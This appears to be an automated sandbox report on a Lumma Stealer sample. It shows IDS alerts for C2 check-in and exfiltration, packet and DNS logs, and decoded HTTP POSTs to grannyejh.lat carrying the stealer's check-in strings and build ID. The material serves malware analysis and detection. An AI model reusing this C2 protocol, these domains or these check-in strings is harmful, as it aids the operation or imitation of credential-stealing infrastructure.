                                                                                                                                    2024-12-18T21:22:35.354788+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649726172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:36.985675+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649739172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:36.985675+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649739172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:55.215987+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649780172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:55.215987+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649780172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:56.052386+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649780172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:57.690905+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649787172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:57.690905+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649787172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:23:04.817390+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649799172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:23:04.817390+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649799172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:23:10.861677+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649811172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:23:10.861677+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649811172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:23:19.992096+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649836172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:23:19.992096+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649836172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:23:39.112966+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649836172.67.179.109443TCP
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Dec 18, 2024 21:22:25.324431896 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:25.324503899 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:25.324580908 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:25.328042030 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:25.328075886 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:26.557643890 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:26.557735920 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:26.560636044 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:26.560651064 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:26.560931921 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:26.611496925 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:26.622318983 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:26.622356892 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:26.622483015 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:31.213377953 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:31.213470936 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:31.213558912 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:31.215415001 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:31.215454102 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:31.215482950 CET49714443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:31.215497971 CET44349714172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:31.223381042 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:31.223437071 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:31.223515987 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:31.223861933 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:31.223880053 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:32.440984011 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:32.441062927 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:32.442406893 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:32.442420006 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:32.442667007 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:32.443924904 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:32.443948984 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:32.443991899 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.354789019 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.355307102 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.355412006 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.355462074 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.356312990 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.356374979 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.356395960 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.363213062 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.363262892 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.363275051 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.371678114 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.371747971 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.371761084 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.424062014 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.424104929 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.470942974 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.474781990 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.517800093 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.517831087 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.550199032 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.550251961 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.550278902 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.550508976 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.550559044 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.550801992 CET49726443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.550822973 CET44349726172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.753108978 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.753165007 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:35.753251076 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.753552914 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:35.753568888 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:36.985594988 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:36.985675097 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:37.057396889 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:37.057435989 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:37.058470964 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:37.059691906 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:37.059853077 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:37.059919119 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:53.879472017 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:53.879554033 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:53.879612923 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:53.879745960 CET49739443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:53.879770041 CET44349739172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:53.996193886 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:53.996225119 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:53.996320963 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:53.996818066 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:53.996831894 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:55.215867996 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:55.215986967 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:55.222851038 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:55.222873926 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:55.223352909 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:55.233506918 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:55.233679056 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:55.233764887 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:55.233860970 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:55.275337934 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:56.052469015 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:56.052740097 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:56.052745104 CET44349780172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:56.052791119 CET49780443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:56.288475037 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:56.288518906 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:56.288687944 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:56.289089918 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:56.289108992 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:57.690820932 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:57.690905094 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:57.789283037 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:57.789318085 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:57.789714098 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:57.811227083 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:57.811419010 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:57.811448097 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:57.811516047 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:22:57.811527967 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:01.972850084 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:01.972953081 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:01.973014116 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:01.973104000 CET49787443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:01.973123074 CET44349787172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:02.973316908 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:02.973368883 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:02.973445892 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:02.973867893 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:02.973891020 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:04.817240000 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:04.817389965 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:04.818952084 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:04.818964005 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:04.819224119 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:04.820686102 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:04.820862055 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:04.820871115 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:08.967911005 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:08.968040943 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:08.968121052 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:08.968218088 CET49799443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:08.968257904 CET44349799172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:09.361861944 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:09.361921072 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:09.361998081 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:09.362303019 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:09.362318039 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.861577034 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.861676931 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.866305113 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.866328001 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.866709948 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.904160976 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.905076981 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.905128002 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.905935049 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.905983925 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.907411098 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.907696962 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.907820940 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.907854080 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.908139944 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.908169985 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.909255981 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.909293890 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.909307957 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.909324884 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.909432888 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.909451008 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.909471035 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.909607887 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.909636974 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.955333948 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.955516100 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.955553055 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.955571890 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.955594063 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.955616951 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.955627918 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:10.955635071 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:10.955638885 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:18.654778004 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:18.654877901 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:18.655066967 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:18.655760050 CET49811443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:18.655785084 CET44349811172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:18.775222063 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:18.775262117 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:18.775481939 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:18.775980949 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:18.775993109 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:19.992010117 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:19.992095947 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:19.993546009 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:19.993561029 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:19.993803978 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:19.995070934 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:19.995100975 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:19.995134115 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:39.113095045 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:39.113348007 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:39.113435984 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:39.113518953 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:39.113564014 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    Dec 18, 2024 21:23:39.113596916 CET49836443192.168.2.6172.67.179.109
                                                                                                                                    Dec 18, 2024 21:23:39.113612890 CET44349836172.67.179.109192.168.2.6
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Dec 18, 2024 21:22:24.862868071 CET5943853192.168.2.61.1.1.1
                                                                                                                                    Dec 18, 2024 21:22:25.002140045 CET53594381.1.1.1192.168.2.6
                                                                                                                                    Dec 18, 2024 21:22:25.007446051 CET6446453192.168.2.61.1.1.1
                                                                                                                                    Dec 18, 2024 21:22:25.318392992 CET53644641.1.1.1192.168.2.6
                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Dec 18, 2024 21:22:24.862868071 CET192.168.2.61.1.1.10x2a3bStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                    Dec 18, 2024 21:22:25.007446051 CET192.168.2.61.1.1.10x6a63Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Dec 18, 2024 21:22:25.002140045 CET1.1.1.1192.168.2.60x2a3bName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                    Dec 18, 2024 21:22:25.318392992 CET1.1.1.1192.168.2.60x6a63No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false
                                                                                                                                    Dec 18, 2024 21:22:25.318392992 CET1.1.1.1192.168.2.60x6a63No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false
                                                                                                                                    • grannyejh.lat
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.649714172.67.179.1094434156C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-18 20:22:26 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 8
                                                                                                                                    Host: grannyejh.lat
                                                                                                                                    2024-12-18 20:22:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                    Data Ascii: act=life
                                                                                                                                    2024-12-18 20:22:31 UTC1023INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 18 Dec 2024 20:22:31 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=n9ibcp635fuuu1bcc76i0m6ffa; expires=Sun, 13-Apr-2025 14:09:06 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXMPst6LuowHlWBoLhxaTEXqnx8xaQX2gbinqQf4RWQ5zONZsIwxguhAUIRGoYnrhRCJDFoeP7xllB6CfQtV3Xut0W2e92i0cJiHcKCLhkccm1DLujjyBsHcyQXvDDG6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f41dd71b89a0f51-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1583&rtt_var=637&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1660034&cwnd=204&unsent_bytes=0&cid=2b7396af736ee6cd&ts=4666&x=0"
                                                                                                                                    2024-12-18 20:22:31 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                    Data Ascii: 2ok
                                                                                                                                    2024-12-18 20:22:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.649726172.67.179.1094434156C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-18 20:22:32 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 52
                                                                                                                                    Host: grannyejh.lat
                                                                                                                                    2024-12-18 20:22:32 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 26 6a 3d
                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--7911731954&j=
                                                                                                                                    2024-12-18 20:22:35 UTC1027INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 18 Dec 2024 20:22:35 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=rk9dfagjsu54alrk5jrbem6aoe; expires=Sun, 13-Apr-2025 14:09:13 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mTncwB1LvcdsY1Gr3KTr4xEauFmA%2FmlIwqW2OUY3RyknAP9CyT3AVOvejsNjMih6EwDTNdg7XN7s%2FjkM6cFfP2UHjfz4VNaH0J2jbHixSK6DReGkaHWKpUAkE6ulWUsd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f41dd96795c8c3c-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1771&rtt_var=708&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=949&delivery_rate=1498973&cwnd=224&unsent_bytes=0&cid=da1729d46f697b17&ts=2922&x=0"
